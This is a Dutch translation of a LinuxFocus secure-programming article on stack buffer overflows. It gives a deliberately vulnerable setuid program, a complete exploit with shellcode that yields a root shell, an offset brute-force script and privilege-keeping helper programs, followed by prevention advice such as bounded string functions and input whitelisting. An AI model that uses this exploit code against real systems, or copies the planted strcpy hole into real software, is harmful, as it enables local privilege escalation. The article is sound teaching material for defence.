[LinuxFocus-icon]
Home  |  Map  |  Index  |  Zoek

Nieuws | Archieven | Links | Over LF
Dit document is beschikbaar in: English  Castellano  Deutsch  Francais  Nederlands  Portugues  Russian  Turkce  

convert to palmConvert to GutenPalm
or to PalmDoc

[image of the authors]
door Frédéric Raynal, Christophe Blaess, Christophe Grenier
<pappy(at)users.sourceforge.net, ccb(at)club-internet.fr, grenier(at)nef.esiea.fr>

Over de auteur:

Christophe Blaess is een onafhankelijke luchtvaart ingenieur. Hij is een Linux fan en werkt veel met dit systeem. Hij coordineert de vertaling van de man pages zoals die te vinden zijn op de site van het Linux Documentation Project.

Christophe Grenier is een 5e jaars student aan de ESIEA, hij werkt daar ook als systeembeheerder. Hij is gek van computer beveiligingssystemen.

Frédéric Raynal gebruikt Linux nu al jaren omdat het niet vervuilend is, niet opgepept wordt met hormonen, MSG of beendermeel... maar alleen met bloed, zweet, tranen en kennis.Vertaald naar het Nederlands door:
Hendrik-Jan Heins <hjh(at)passys.nl>

Inhoud:

 

Het vermijden van veiligheidslekken bij het ontwikkelen van een applicatie - Deel 3: buffer overflows

[article illustration]

Kort:

In dit artikel zullen we een echte buffer overflow in een applicatie laten zien. We zullen laten zien dat deze een eenvoudig te exploiteren veiligheidsgat oplevert en hoe dit te vevrmijden is We gaan er bij dit artikel gaat er vanuit dat u de twee voorgaande artikelen hebt gelezen: 

Buffer overflows

In het voorgaande artikel hebben we een klein programmaatje van ongeveer 50 bytes geschreven en we konden een commandoregel starten of beeindigen als het misging. Nu moeten we deze code invoegen in de applicatie die we willen aanvallen. Dit kan worden gedaan door het retouradres van een functie te overschrijven en het te vervangen door het adres van onze commandoregeldcode. Dit kan je doen door een overflow van een autimatische variabele die in de proces stack staat te forceren.

In het volgende programma bijvoorbeeld, copieren we de string die als eerste opdracht is gegevens als argument in de commandoregel naar een 500 byte buffer. Deze copieeractie kan worden gedaan zonder te controleren of hij groter is dan het formaat van de buffer. Zoals we later zullen zien, door gebruik te maken van de functie strncpy() kunnen we dit probleem omzeilen.

 /* vulnerable.c */

 #include <string.h>

 int main(int argc, char * argv [])
 {
  char buffer [500];

  if (argc > 1)
  strcpy(buffer, argv[1]);
  return (0);
 }

De buffer is een automatische variabele, de ruimte die gebruikt wordt door de 500 bytes wordt zodra we de main() functie starten gereserveerd in de stack. Als we het kwetsbare programma draaien met een argument van meer dan 500 karakters, overvult de gegevensstroom de buffer en "valt" deze de proces stack binnen. Zoals we al eerder gezien hebben, bevat de stack het adres van de volgende instructie die uitgevoer moet worden (ook wel bekend als het retouradres). Om gebruik te kunnen maken van dit veiligheidsgat is het voldoende om het retouradres van de functie te vervangen door het commandoregel adres dat je wilt uitvoeren. Deze commandoregelcode wordt ingevoegd in het "lichaam" van de buffer, gevolgd door z'n adres in het geheugen.

 

Positie in het geheugen

Het geheugenadres van de commandoregelcode krijgen is vrij lastig. We moeten de offset tussen het register %esp dat naar de top van de stack verwijst en het geheugenadres zien te verkrijgen. Om het voordeel van een kleine veilige marge te krijgen, is het begin van de buffer gevuld met de NOP assemblage instructie; dit is een neutrale instructie van een byte die helemaal geen effect heeft. Dus als het beginadres wijst naar een punt voor het echte begin van de commandoregelcode, gaat de CPU van NOP naar NOP totdat hij onze code bereikt. Om meer kans te maken op succes, plaatsen we de commandoregelcode in het midden van de buffer, gevolgd door het startadres dat tot het einde herhaald wordt en vooraf gegaan door een NOP blok. diagram 1 illustreert dit:

Diag. 1 : de buffer is speciaal voor dit gebruik opgevuld.
[buffer]


Diagram 2 beschrijft de staat van de stack voor en na de overflow. Het zorgt ervoor dat alle bewaarde informatie (bewaarde %ebp, bewaarde %eip, argumenten,...) wordt vervangen door het nieuwe retouradres: het beginadres van het deel van de buffer waar we de commandoregelcode geplaatst hebben.

Diag. 2 : staat van de stack voor en na de overflow
pile_bef.gif
pile_aft.gif
Voor
Na


Er bestaat echter een ander probleem gerelateerd aan de variabele groepering binnen de stack. Een adres is langer dan 1 byte en wordt daarom over verscheidene bytes bewaard, dit kan ervoor zorgen dat de groepering binnen de stack niet altijd exact past. Met de 'trail en error'-methode kan de correcte groepering gevonden worden. Aangezien onze CPU woorden vn 4 bytes gebruikt, bestaat de groepering uit 0, 1, 2 of 3 bytes (zie hiervoor Deel 2 = article 183 over stack organisatie ). In diagram 3, corresponderen de grijze delen met de geschreven 4 bytes. Het eerste geval waar het retouradres compleet wordt overschreven door de correcte groepering is het enige geval dat zal werken. De andere gevallen zullen leiden tot een segmentation violation of illegal instruction fouten. Deze empirische methode om te zoeken werkt uitstekend aangezien de huidige krachtige computers dit soort testen zonder enig probleem aankunnen.

Diag. 3 : mogelijke groepering met 4 byte woorden
[align]
 

Start programma

We gaan een klein programmaatje schrijven om een kwetsbare applicatie op te kunnen starten door data te schrijven die een stack overflow zal genereren. Dit programma heeft verschillende mogelijkheden om de plaatsing van de commandoregelcode in het geheugen te bepalen en op die manier te kiezen welk programma te draaien. Deze versie, geinspireerd door het artikel van Aleph One uit phrack magazine nummer 49, is beschikbaar op de website van Christophe Grenier.

Ho sturen we nu onze voorbereidde buffer naar de doel applicatie? Normaal gesproken kan je een commandoregelparameter gebruiken zoals in vulnerable.c of een omgevingsvariabele. De overflow kan ook veroorzaakt worden door te typen in de gegevens of gewoon door ze uit te lezen uit een bestand.

Het generic_exploit.c programma begint met het groeperen van de correcte buffer grootte, daarna copieert hij de commandoregelcode daar naartoe en vult deze op met de adressen en NOP codes zoals hierboven is uitgelegd. Daarna maakt hij een argumenten array aan en draait hij de doel applicatie door gebruik te maken van de instructie execve(), deze laatste vervangt het lopende proces door het aangeroepen proces. Het generic_exploit programma moet weten wat de grootte van de te exploiteren buffer is (liefst is de te schrijven buffer een beetje groter dan de te exploiteren buffer zodat het retouradres zeker overschreven is), de geheugen offset en de groepering zijn ook van belang. We geven aan of de buffer wordt aangegeven als een omgevingsvariabele (var) of vanaf de commandoregel (novar). Het force/noforce argument geeft aan of de aanroep de functie setuid()/setgid() van de commandoregelcode opvraagt.


/* generic_exploit.c */

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/stat.h>
#define NOP           0x90

char shellcode[] =
    "\xeb\x1f\x5e\x89\x76\xff\x31\xc0\x88\x46\xff\x89\x46\xff\xb0\x0b"
    "\x89\xf3\x8d\x4e\xff\x8d\x56\xff\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
    "\x80\xe8\xdc\xff\xff\xff";

unsigned long get_sp(void)
{
  __asm__("movl %esp,%eax");
}

#define A_BSIZE   1
#define A_OFFSET  2
#define A_ALIGN   3
#define A_VAR    4
#define A_FORCE   5
#define A_PROG2RUN 6
#define A_TARGET  7
#define A_ARG    8

int main(int argc, char *argv[])
{
  char *buff, *ptr;
  char **args;
  long addr;
  int offset, bsize;
  int i,j,n;
  struct stat stat_struct;
  int align;
  if(argc < A_ARG)
  {
   printf("USAGE: %s bsize offset align (var / novar)
       (force/noforce) prog2run target param\n", argv[0]);
   return -1;
  }
  if(stat(argv[A_TARGET],&stat_struct))
  {
   printf("\nCannot stat %s\n", argv[A_TARGET]);
   return 1;
  }
  bsize = atoi(argv[A_BSIZE]);
  offset = atoi(argv[A_OFFSET]);
  align = atoi(argv[A_ALIGN]);

  if(!(buff = malloc(bsize)))
  {
   printf("Can't allocate memory.\n");
   exit(0);
  }

  addr = get_sp() + offset;
  printf("bsize %d, offset %d\n", bsize, offset);
  printf("Using address: 0lx%lx\n", addr);

  for(i = 0; i < bsize; i+=4) *(long*)(&buff[i]+align) = addr;

  for(i = 0; i < bsize/2; i++) buff[i] = NOP;

  ptr = buff + ((bsize/2) - strlen(shellcode) - strlen(argv[4]));
  if(strcmp(argv[A_FORCE],"force")==0)
  {
   if(S_ISUID&stat_struct.st_mode)
   {
    printf("uid %d\n", stat_struct.st_uid);
    *(ptr++)= 0x31;     /* xorl %eax,%eax  */
    *(ptr++)= 0xc0;
    *(ptr++)= 0x31;     /* xorl %ebx,%ebx  */
    *(ptr++)= 0xdb;
    if(stat_struct.st_uid & 0xFF)
    {
   *(ptr++)= 0xb3;    /* movb $0x??,%bl  */
   *(ptr++)= stat_struct.st_uid;
    }
    if(stat_struct.st_uid & 0xFF00)
    {
   *(ptr++)= 0xb7;    /* movb $0x??,%bh  */
   *(ptr++)= stat_struct.st_uid;
    }
    *(ptr++)= 0xb0;     /* movb $0x17,%al  */
    *(ptr++)= 0x17;
    *(ptr++)= 0xcd;     /* int $0x80    */
    *(ptr++)= 0x80;
   }
   if(S_ISGID&stat_struct.st_mode)
   {
    printf("gid %d\n", stat_struct.st_gid);
    *(ptr++)= 0x31;     /* xorl %eax,%eax  */
    *(ptr++)= 0xc0;
    *(ptr++)= 0x31;     /* xorl %ebx,%ebx  */
    *(ptr++)= 0xdb;
    if(stat_struct.st_gid & 0xFF)
    {
   *(ptr++)= 0xb3;    /* movb $0x??,%bl  */
   *(ptr++)= stat_struct.st_gid;
    }
    if(stat_struct.st_gid & 0xFF00)
    {
   *(ptr++)= 0xb7;    /* movb $0x??,%bh  */
   *(ptr++)= stat_struct.st_gid;
    }
    *(ptr++)= 0xb0;     /* movb $0x2e,%al  */
    *(ptr++)= 0x2e;
    *(ptr++)= 0xcd;     /* int $0x80    */
    *(ptr++)= 0x80;
   }
  }
  /* Patch shellcode */
  n=strlen(argv[A_PROG2RUN]);
  shellcode[13] = shellcode[23] = n + 5;
  shellcode[5] = shellcode[20] = n + 1;
  shellcode[10] = n;
  for(i = 0; i < strlen(shellcode); i++) *(ptr++) = shellcode[i];
  /* Copy prog2run */
  printf("Shellcode will start %s\n", argv[A_PROG2RUN]);
  memcpy(ptr,argv[A_PROG2RUN],strlen(argv[A_PROG2RUN]));

  buff[bsize - 1] = '\0';

  args = (char**)malloc(sizeof(char*) * (argc - A_TARGET + 3));
  j=0;
  for(i = A_TARGET; i < argc; i++)
   args[j++] = argv[i];
  if(strcmp(argv[A_VAR],"novar")==0)
  {
   args[j++]=buff;
   args[j++]=NULL;
   return execve(args[0],args,NULL);
  }
  else
  {
   setenv(argv[A_VAR],buff,1);
   args[j++]=NULL;
   return execv(args[0],args);
  }
}

Om gebruik te kunnen maken van vulnerable.c, moeten we een buffer hbben die groter is dan de verwachtte buffergrootte van de applicatie. Dus we kiezen bijvoorbeeld een buffergroote van 600 bytes inplaats van de verwachtte groote van 500 bytes. We vinden de offset gerelateerd aan de top van de stack door achtereenvolgens verschillende malen te proberen. Het dres dat is gemaakt met de instructie addr = get_sp() + offset; wordt gebruikt om het retouradres te overschrijven, dt gaat je wel lukken....met een beetje geluk! De operatie is gebaseerd op de veronderstelling dat het %esp register niet te veel zal verplaatsen gedurende het huidige proces en het nieuw aangeroepen proces an het einde van het programma. Vrijwel niets is zeker: verschillende gebeurtenissen zouden de staat van de stack kunnen wijzigen tussen de tijd van de berekening en het moment van aanroepen van het te exploiteren programma. Hier hebben we wel succes en kunnen we een te exploiteren overflow met een -1900 offset activeren. Om de ervaring te completeren, moet het vulnerable doel ingesteld staan op Set-UID root.

 $ cc vulnerable.c -o vulnerable
 $ cc generic_exploit.c -o generic_exploit
 $ su
 Password:
 # chown root.root vulnerable
 # chmod u+s vulnerable
 # exit
 $ ls -l vulnerable
 -rws--x--x  1 root   root    11732 Dec 5 15:50 vulnerable
 $ ./generic_exploit 600 -1900 0 novar noforce /bin/sh ./vulnerable
 bsize 600, offset -1900
 Using address: 0lxbffffe54
 Shellcode will start /bin/sh
 bash# id
 uid=1000(raynal) gid=100(users) euid=0(root) groups=100(users)
 bash# exit
 $ ./generic_exploit 600 -1900 0 novar force /bin/sh /tmp/vulnerable
 bsize 600, offset -1900
 Using address: 0lxbffffe64
 uid 0
 Shellcode will start /bin/sh
 bash# id
 uid=0(root) gid=100(users) groups=100(users)
 bash# exit
In het eerste geval (noforce), verandert onze uid niet. We hebben echter wel een nieuw euid dat ons voorziet van alle rechten. Dus zelfs wanneer vi tijdens het bewerken van /etc/passwd zegt dat hij ingesteld staat als alleen lezen, kunnen we nog steeds in het bestand schrijven en alle veranderingen zullen werken: je hoeft alleen het schrijven met de opdracht w! te forceren :) De force parameter staat van begin af aan uid=euid=0 toe.

Om de offset waardes automatisch te vinden voor een overflow kunnen we het volgende kleine commandoregelscriptje gebruiken:

 #! /bin/sh
 # find_exploit.sh
 BUFFER=600
 OFFSET=$BUFFER
 OFFSET_MAX=2000
 while [ $OFFSET -lt $OFFSET_MAX ] ; do
  echo "Offset = $OFFSET"
  ./generic_exploit $BUFFER $OFFSET 0 novar force /bin/sh ./vulnerable
  OFFSET=$(($OFFSET + 4))
 done
Tijdens onze exploitatie hebben we geen rekening gehouden met de mogelijke groeperingsproblemen. Dan is het dus mogelijk dat dit voorbeeld voor jou niet werkt met deze waardes, of dat het helemaal niet werkt vanwege groeperingsproblemen. (voor degenen die dit toch willen testen: de groeperingsparameter moet veranderd worden naar 1, 2, of 3 (hier is ie 0)). Sommige systemen staan het schrijven van halve woorden in geheugengebieden niet toe, maar dit geldt niet voor linux.  

Commandoregel(s) problemen

Helaas is de verkregen commandoregel soms onbruikbaar doordat hij zichzelf spontaan beeindigt of op het moment dat je op een toets drukt. Wij gebruiken een ander programma om de privilleges die we zo zorgvuldig hebben verkregen, te behouden:

/* set_run_shell.c */
#include <unistd.h>
#include <sys/stat.h>

int main()
{
 chown ("/tmp/run_shell", geteuid(), getegid());
 chmod ("/tmp/run_shell", 06755);
 return 0;
}

Aangezien ons te exploiteren gat slechts een taak tegelijk aan kan, gaan we de rechten die gewonnen zijn uit het run_shell programa overdragen met behulp van het set_run_shell programma. Dan zullen we de gewenste commandoregel krijgen

/* run_shell.c */
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>

int main()
{
 setuid(geteuid());
 setgid(getegid());
 execl("/tmp/shell","shell","-i",0);
 exit (0);
}
De optie -i correspondeert met interactive. Waarom zou je de rechten niet direct aan een commandoregel geven? Dit is alleen maar omdat de s bit niet beschikbaar is voor iedere commandoregel. De recente versies controleren of de UID gelijk is aan de EUID, evenals de GID en de EGID. bash2 en tcsh bevatten deze verdedigingsfunctie, maar noch bash, of ash bevatten deze. Deze methode dient verbeterd te worden zodra de partitie waarop run_shell staat (hier, /tmp) is gemount met de optie nosuid of noexec.  

Preventie

Aangezien we een Set-UID programma met een buffer overflow bug hebben inlusief broncode, kunnen we een aanval voorbereiden die de uitvoer van een willekeurige code onder de naam en ID van de gebruiker bevat. Het is echter ons doel om veiligheidslekken te voorkomen. Nu gaan we een paar regels bekijken om buffer overflows te voorkomen.

 

Het controleren van de indices

De eerste regel die je moet volgen is gewoon een kwestie van gezond verstand: de indices die gebruikt worden om een array te veranderen moeten altijd goed gecontroleerd worden. Een 'klunzige' loop ziet er ls volgt uit:

 for (i = 0; i <= n; i ++) {
  table [i] = ...
Deze bevat waarschijnlijk een fout omdat het <= teken in plaats van het < teken staat, aangezien een toegang wordt toegestaan na het einde van de array. Als het makkelijk te zien is in de loop, is het lastiger om met een loop aflopende indices te maken, aangezien je je ervan moet verzekeren dat je niet onder de nul uitkomt. Behalve het triviale geval for(i=0; i<n ; i++), moet je het algoritme verscheidene malen controleren (of zelf iemand vragen om het voor jou te controleren), vooral wanneer de index in de loop gemodificeerd wordt.

Hetzelfde type probleem kan gevonden worden bij strings: je moet altijd onthouden om een byte toe te voegen voor het finale nul karakter. Een van de meest gemaakte 'groentjes'-fouten is het vergeten van de string terminatie. En nog vervelender is dat het lastig is om te diagnostiseren aangezien onvoorspelbare variabele groeperingen (dus compileren met debug informatie) het probleem kan maskeren.

Onderschat array indices niet als een bedreiging voor de veiligheid van een applicatie. We hebben gezien dat slechte een een byte overflow voldoende is om een veiligheidslek te maken (zie Phrack nummer 55), het invoegen van de commandoregelcode in een omgevingsvariabele bijvorbeeld.

 #define BUFFER_SIZE 128

 void foo(void) {

  char buffer[BUFFER_SIZE+1];

  /* end of string */
  buffer[BUFFER_SIZE] = '\0';

  for (i = 0; i<BUFFER_SIZE; i++)
   buffer[i] = ...
 }
 

Gebruik maken van n functies

Als conventie zijn standaard C bibliotheekfuncties zich bewust van het einde van de string, vanwege de nul byte. De strcpy(3) functie bijvoorbeeld copieert de originele string inhoud naar een doelstring totdat hij de nul byte bereikt. In sommige gevallen wordt dit gedrag gevaarlijk; we hebben gezien dat de volgende code een veiligheidslek bevat:
 #define LG_IDENT 128

 int fonction (const char * name)
 {
  char identity [LG_IDENT];
  strcpy (identity, name);
  ...
 }
Functies die de te copieren lengte limiteren vermijden dit probleem. Deze functies hebben een `n' in het midden van hun naam, bijvoorbeeld strncpy(3) als een vervanger voor strcpy(3), strncat(3) voor strcat(3) of zelfs strnlen(3) voor strlen(3).

Je moet echter voorzichtig zijn met de strncpy(3) limitatie, aangezien hij enkele bijwerkingen vertoont: wanneer de bron-string korter is dan de doelstring, zal de gecopieerde versie gecomplementeerd worden met nul karakters tot de n limiet en presteer de applicatie minder.Aan de andere kant wordt de bronstring getrunceerd en het copie zal nit eindigen op een nul als de bronstring laner is dan de doelstring. Dan moet je hem handmatig beeindigen. Als je dit in aanmerking neemt, wordt de voorgaande routine:

 #define LG_IDENT 128

 int fonction (const char * name)
 {
  char identity [LG_IDENT+1];
  strncpy (identity, name, LG_IDENT);
  identity [LG_IDENT] = '\0';
  ...
 }
Natuurlijk gelden de zelfde principes voor routines om 'brede' karakters te manipuleren (meer dan 8 bit), bijvoorbeeld wcsncpy(3) zou de voorkeur moeten hebben boven wcscpy(3) of wcsncat(3) voor wcscat(3). Natuurlijk, het programma wordt groter, maar de veiligheid verbetert ook.

Net als strcpy(), controleert ook strcat(3) de buffer grootte niet. De functie strncat(3) voegt een karakter toe aan het einde van de string als het daarvoor de ruimte vindt. Hierbij vervangt hij strcat(buffer1, buffer2); door strncat(buffer1, buffer2, sizeof(buffer1)-1); en elimineert het risico

De functie sprintf() staat het copieren van geformatteerde data in een string toe. Het heeft ook een versie die het aantal te copieren bytes kan controleren: snprintf(). Deze functie geeft het aantal karakters dat in de doelstring wordt geschreven weer (zonder rekening te houden met de '\0'). Het testen vn de geretourneerde warde vertelt je of de schrijfactie correct is uitgevoerd:

 if (snprintf(dst, sizeof(dst) - 1, "%s", src) > sizeof(dst) - 1) {
  /* Overflow */
  ...
 }

Dit is het duidelijk niet meer waard zodra de gebruiker kan bepalen hoeveel bytes er gecopieerd mogen worden. Zo'n soort gat in BIND (Berkeley Internet Name Daemon) heeft een boel crackers bezig gehouden:

 struct hosten *hp;
 unsigned long address;

 ...

 /* copy of an address */
 memcpy(&address, hp->h_addr_list[0], hp->h_length);
 ...

Dit zou altijd 4 bytes moeten zijn. Echter, als je hp->h_length kan veranderen, dan kan je de stack veranderen. Volgens dezelfde regels is het dan ook verplicht om de gegevenslengte te controleren voor copieren:
 struct hosten *hp;
 unsigned long address;

 ...

 /* test */
 if (hp->h_length > sizeof(address))
  return 0;

 /* copy of an address */
 memcpy(&address, hp->h_addr_list[0], hp->h_length);
 ...
Onder sommige omstandigheden is het mogelijk om op die manier een truncatie uit te voeren (pad, gastheernaam, URL,...) en dan moeten dingen eerder in het programma gedaan zijn zodra de gegevens worden ingetoetst.  

Valideren van gegevens in twee stappen

Een programma dat draait met privileges die afwijken van die van z'n gebruiker impliceert dan ook dat je alle gegevens moet beschermen en dat je alle inkomende gegevens moet zien als verdacht.

Dit betreft allereerst de string input routines. Volgens wat we net hebben gezegd, zullen we er niet op staan dat je nooit gets(char *array) gebruikt, aangezien de lengte van de string niet gecontroleerd wordt (noot van de auteur: deze routine zou verboden moeten worden door de koppelings bewerker voor nieuw gecompileerde programma's). Meer verborgen risico's zitten verstopt in scanf(). De regel

scanf ("%s", string)
is net zo gevaarlijk als gets(char *array), maar hij is niet zo duidelijk. Echter functies van de scanf() familie bieden een controlemechanisme op het gegevensformaat:
 char buffer[256];
 scanf("%255s", buffer);
Deze manier van formatteren limiteert het aantal karakters dat gecopieerd wordt in de buffer tot 255. Aan de andere kant plaatst scanf() de karakters die hij niet ziet zitten terug in de inkomende stroom en dus zijn de risico's van een lock gegenereerd door fouten vrij hoog.

Bij het gebruik vn C++, vervangt de cin stroom de klassieke functies die gebruikt worden in C (ook als je ze nog steeds kan gebruiken). Het volgende programma vult een buffer:

 char buffer[500];
 cin>>buffer;
Zoals je kan zien voert hij geen tests uit! We zitten in een situatie die lijkt op gets(char *array) terwijl we C gebruiken: een deur staat wagenwijd open. De ios::width() lid functie staat de reparatie van het maximum aantal te lezen karakters toe.

Voor het lezen van gegeves moeten twee stappen orden gezet. Een eerste fase bestaat uit het verkrijgen van de string met fgets(char *array, int size, FILE stream), dit limiteert het formaat van het gebruikte geheugengebied. Vervolgend worden de te lezen gegevens geformatteerd, door bijvoorbeeld sscanf(). De eerste fase kan nog meer, zoals het invoegen van fgets(char *array, int size, FILE stream) in een loop waardoor het benodigde geheugen automatisch wordt ingevoegd, zonder arbitraire grenzen. De GNU extensie getline() kan dat voor je doen. Het is tevens mogelijk om getypede karakters te valideren door middel van isalnum(), isprint(), etc. De functie strspn() staat effectieve filtering toe. Het programma wordt een beetje trager, maar de gevoelige delen van de code zijn beschermd tegen illegale gegevens met een kogelvrij vest

Direct gegevens invoeren is niet het enige aan te vallen punt. De gegevens bestanden van de software zijn kwetsbaar, maar de code die geschreven is om ze te lezen is meestal sterker dan die voor de console input, aangezien de programmeurs intuitief bestandsinhoud die door de gebruiker wordt aangeleverd niet vertrouwt.

De buffer overflow aanvallen leunen vaak op iets anders: omgevings strings. We moeten niet vergeten dat een programmeur de omgeving van een proces volledig kan configureren voordat hij hem start. De conventie die zegt dat een omgevingsstring van het type "NAME=VALUE" moet zijn, kan geexploiteerd worden door een kwadwillende gebruiker. Het gebruik maken van de getenv() routine vraagt enige attentie, vooral wanneer het de lengte van de retour string betreft (arbitraire lengte) en z'n inhoud (waar je ieder karakter kan vinden, inclusief `='). De string die geretourneerd wordt door getenv() zal worden behandeld zoals degene die gegeven wordt door fgets(char *array, int size, FILE stream), waarbij de lengte wordt nagekeken en hij wordt karakter voor karakter gevalideerd.

Gebruik maken van dergelijke functies is net zoiets als de toegang beheren tot een computer: standaard is alles verboden! Daarna kan je een paar dingen toestaan:

 #define GOOD "abcdefghijklmnopqrstuvwxyz\
        BCDEFGHIJKLMNOPQRSTUVWXYZ\
        1234567890_"

 char *my_getenv(char *var) {
  char *data, *ptr

  /* Getting the data */
  data = getenv(var);

  /* Filtering
    Rem : obviously the replacement character must be
       in the list of the allowed ones !!!
  */
  for (ptr = data; *(ptr += strspn(ptr, GOOD));)
   *ptr = '_';

  return data;
 }

De functie strspn() maakt het makkelijk: hij zoekt naar het eerste karakterdat geen deel is van de juiste karakterset. Hij retourneert de string lengte (beginnend bij 0) met lleen de toegestane karakters. Je moet deze logica nooit omdraaien. Valideer niet tegen karakters die je niet wilt. Controleer altijd tegen de toegestane karakters.

 

Het gebruik van dynamische buffers

De Buffer overflow vertrouwt op de stack inhoud om een variabele te overschrijven en het retouradres van een functie te veranderen. De aanval behelst automatisch gegenereerde gegevens die alleen in de stack staan. Een manier om het probleem te verplaatsen is het vervangen van de karaktertabellen die in de stack staan gealloceerd met dynamische vriabelen in de heap. Om dit te doen, moeten we de volgorde veranderen.

 #define LG_STRING  128
 int fonction (...)
 {
  char array [LG_STRING];
  ...
  return (result);
 }
with :
 #define LG_STRING  128
 int fonction (...)
 {
  char *string = NULL;
  if ((string = malloc (LG_STRING)) == NULL)
    return (-1);
  memset(string,'\0',LG_STRING);
  [...]
  free (string);
  return (result);
 }
Deze regels blazen de code ontzettend op en riskeren geheugenlekken, maar we moeten gebruik maken van deze veranderingen om de aanloop en arbitraire lengte limieten te veranderen. Laten we toevoegen dat je niet hetzelfde resultaat kan verwachtendoor gebruik te maken van alloca(). De code ziet er ongeveer hetzelfde uit, maar alloca alloceert de gegevens in de proces stack en dat leidt tot hetzelfde probleem als automatiche variabelen. Het initialiseren van geheugen naar nul door gebruik te maken van memset() vermijdt een paar problemenmet ongeinitialiseerde variabelen. Ook hier corrigeert dit niet het probleem, de exploitatie wordt alleen veel lastiger. Degenen die door willen gaan met het onderwerp kunnen het artikel over Heap overflows in w00w00 lezen.

En laten we tenslotte zeggen dat het onder sommige omstandigheden mogelijk is om snel van veiligheidslekken af te komen door het sleutelwoord static toe te voegen voor de buffer verklaring. De compiler alloceert deze variabele in het gegevens segement, ver van de proces stack. Het wordt onmogelijk om een commandoregel te verkrijgen, maar dit lost het probleem vn een DoS (Denial of Service) aanval niet op. Natuurlijk werkt dit niet als de routine recursief wordt aangeroepen. Dit 'medicijn' moet worden gezien als een paardenmiddel, het moet alleen worden ingezet om een veiligheidslek te voorkomen in noodgevallen zonder veel aan de code te veranderen.

 

Conclusie

We hopen dat dit overzicht van buffer overflows je helpt om veiliger te programmeren. Ook al vraagt de exploitatie van deze gaten een grote dusis kennis van de achterliggende mechanismen, het algemene principe is desalniettemin vrij toegangelijk. En aan de andere kant is de implementatie van enige voorzorgsmaatregelen niet zo moeilijk. Vergeet niet dat het sneller werkt om een programma van begin af aan veilig te programmeren dan het later alsnog te repareren. We zullen op dit principe nog terugkomen in ons volgende artikel over format bugs.  

Links

 

Talkback voor dit artikel

Elk artikel heeft zijn eigen talkback pagina. Daar kan je commentaar geven of commentaar van anderen lezen:
 talkback pagina 

Site onderhouden door het LinuxFocus editors team
© Frédéric Raynal, Christophe Blaess, Christophe Grenier, FDL
LinuxFocus.org

Klik hier om een fout te melden of commentaar te geven
Vertaling info:
fr --> -- : Frédéric Raynal, Christophe Blaess, Christophe Grenier <pappy(at)users.sourceforge.net, ccb(at)club-internet.fr, grenier(at)nef.esiea.fr>
fr --> en: Georges Tarbouriech <georges.t(at)linuxfocus.org>
en --> en: Lorne Bailey <sherm_pbody(at)yahoo.com>
en --> nl: Hendrik-Jan Heins <hjh(at)passys.nl>

2002-06-08, generated by lfparser version 2.28